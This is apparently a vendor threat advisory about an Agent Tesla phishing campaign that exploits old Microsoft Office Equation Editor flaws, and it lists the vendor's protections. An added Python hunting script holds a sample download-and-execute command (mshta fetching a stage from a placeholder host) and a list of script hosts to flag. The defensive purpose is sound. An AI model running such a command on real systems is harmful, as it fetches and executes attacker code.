Agent Tesla Malware Attack
Severity: High
Platform: Microsoft Windows, MS Office (Word/Excel)
Vendor: Microsoft
Attack Type: Malware
New Agent Tesla variant in the wild
FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant. This well-known malware family is a .NET-based Remote Access Trojan (RAT) and data stealer that gains initial access by exploiting the Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802. The Agent Tesla core module can collect sensitive information from the victim's device, including saved credentials, keylogging data, and device screenshots.
Background
Agent Tesla made its debut in 2014, and numerous iterations of the malware have been released since then. It employs various tactics to avoid detection, which makes analysis challenging. Agent Tesla is typically spread through phishing emails and has a range of capabilities, including keylogging, screen capture, form-grabbing, and credential theft. It can also harvest credentials from software such as Google Chrome, Mozilla Firefox, and Microsoft Outlook, which significantly amplifies the damage it can cause.
CVE-2017-11882 and CVE-2018-0802 are Remote Code Execution (RCE) vulnerabilities in Microsoft Office that result in memory corruption inside the EQNEDT32.EXE (Equation Editor) process. In this campaign, these two vulnerabilities are exploited to download and execute the Agent Tesla file on the victim's device.
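As an added illustration of the hunting logic a defender could apply to the EQNEDT32.EXE behaviour described above (this is not FortiGuard's code, and the events, paths and URL below are constructed samples, not telemetry from this campaign):

```python
# Hunt for Equation Editor (EQNEDT32.EXE) abuse in process-creation telemetry.
# Equation Editor normally spawns no child processes, so any child is worth
# triage; a script host or shell child with a URL on its command line matches
# the download-and-execute step that follows exploitation of these CVEs.
import re
from typing import List, Optional

EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed sample events in a simplified Sysmon Event ID 1 shape (not real data).
SAMPLE_EVENTS = [
    {"pid": 4100, "image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\explorer.exe", "cmd": '"EXCEL.EXE" invoice.xlsx'},
    {"pid": 4212, "image": EQN,                      # Equation Editor started via DCOM
     "parent_image": r"C:\Windows\System32\svchost.exe", "cmd": '"EQNEDT32.EXE" -Embedding'},
    {"pid": 4300, "image": r"C:\Windows\System32\cmd.exe", "parent_image": EQN,
     "cmd": "cmd /c mshta http://example.invalid/EXAMPLE_STAGE2.hta"},
    {"pid": 4320, "image": r"C:\Users\alice\AppData\Local\Temp\EXAMPLE_DROPPED.exe",
     "parent_image": EQN, "cmd": "EXAMPLE_DROPPED.exe"},
    {"pid": 4330, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmd": "notepad.exe"},
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (hypothetical helper)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_event(ev: dict) -> Optional[dict]:
    """Return a finding for one event, or None if EQNEDT32.EXE is not its parent."""
    if basename(ev["parent_image"]) != "eqnedt32.exe":
        return None
    child = basename(ev["image"])
    urls = URL_RE.findall(ev["cmd"])
    # Any child of Equation Editor is suspicious; a script host or a URL on the
    # command line is the download-and-execute chain and is rated higher.
    severity = "high" if (child in SCRIPT_HOSTS or urls) else "medium"
    return {"pid": ev["pid"], "child": child, "urls": urls, "severity": severity}

def hunt(events: List[dict]) -> List[dict]:
    """Run the triage over a batch of events and keep only the findings."""
    return [f for f in (triage_event(e) for e in events) if f is not None]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```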
Latest Development
July 2023: In late July 2023, FortiGuard Labs observed a new Agent Tesla variant being propagated; it was blocked automatically by the Sandbox Behaviour engine. Telemetry shows a total of over 150 thousand blocks in July and August 2023.
September 05, 2023: FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant and published a detailed analysis blog:
https://www.fortinet.com/blog/threat-research/agent-tesla-variant-spread-by-crafted-excel-document
The vulnerabilities CVE-2017-11882 and CVE-2018-0802 remain popular among threat actors, suggesting that unpatched devices are still in the wild even after more than five years. FortiGuard Labs observed and blocked over 3000 attacks per day at the IPS level, and the number of vulnerable devices observed in FortiGuard telemetry is around 1300.
Fortinet customers remain protected from this campaign and other Agent Tesla variants by FortiGuard's AntiSPAM, IPS, Web Filtering, AntiVirus, and Behaviour Engine (AI/ML) services. As mentioned in the blog above, FortiGuard continues to recommend that users and organizations complete the NSE training: NSE 1 – Information Security Awareness, a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks and to follow other best practices.
Attack Sequence
FortiGuard Cybersecurity Framework
PROTECT
- AV: Detects and blocks the new Agent Tesla malware
- Anti-spam: Detects unwanted spam before it reaches customers' inboxes
- Vulnerability: Detects Windows endpoints running vulnerable Microsoft Office (CVE-2018-0802, CVE-2017-11882)
- AV (Pre-filter): Detects and blocks the new Agent Tesla malware
- Behavior Detection: Detects unknown/new variants of Agent Tesla malware
- IPS: Detects and blocks attempts to exploit a Code Execution vulnerability in Microsoft Office (CVE-2018-0802, CVE-2017-11882)
- Web & DNS Filter: Detects and blocks known malicious IPs, domains and URLs related to Agent Tesla malware
- Botnet C&C: Blocks connection channels to known C2 servers associated with Agent Tesla
DETECT
- Outbreak Detection
- Threat Hunting
- IOC
- Content Update
RESPOND
- Assisted Response Services: Experts to assist you with analysis, containment and response activities.
- Automated Response: Services that can automatically respond to this outbreak.
RECOVER
- NOC/SOC Training: Train your network and security professionals and optimize your incident response to stay on top of cyberattacks.
- End-User Training: Raise security awareness among your employees, who are continuously targeted by phishing, drive-by downloads and other forms of cyberattack.
IDENTIFY
- Vulnerability Management: Reduce the attack surface from software vulnerabilities via systematic and automated patching.
- Attack Surface Hardening: Check Security Fabric devices to build actionable configuration recommendations and key indicators.
- Business Reputation: Know attackers' next move to protect your business brand.
Threat Intelligence
Indicators of compromise